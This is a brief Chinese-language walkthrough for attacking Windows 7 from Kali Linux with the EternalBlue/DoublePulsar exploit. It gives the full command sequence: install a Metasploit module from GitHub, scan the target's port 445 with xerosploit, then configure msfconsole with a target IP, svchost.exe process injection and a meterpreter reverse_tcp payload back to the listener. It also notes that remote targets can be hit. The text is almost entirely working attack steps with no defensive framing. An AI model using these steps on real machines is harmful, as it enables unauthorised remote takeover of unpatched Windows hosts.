kali下Eternalblue攻击win7

参考:
https://www.youtube.com/watch?v=goUVgchVGB0
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
https://github.com/LionSec/xerosploit(没有xerosploit可以通过这里获取)
更多详细内容:http://www.jianshu.com/p/a34a3d560ffd

cd /tmp
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
mv eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

xerosploit
scan
目标IP
pscan
run
#确认一下目标的445端口是open的
#可以使用其他工具做探测,也可以对远程目标打击,只要获取目标IP就好

msfconsole
use exploit/windows/smb/eternalblue_doublepulsar
set rhost 目标IP 
set PROCESSINJECT svchost.exe
set payload windows/meterpreter/reverse_tcp
set lhost 监听者IP
exploit

你可能感兴趣的:(安全)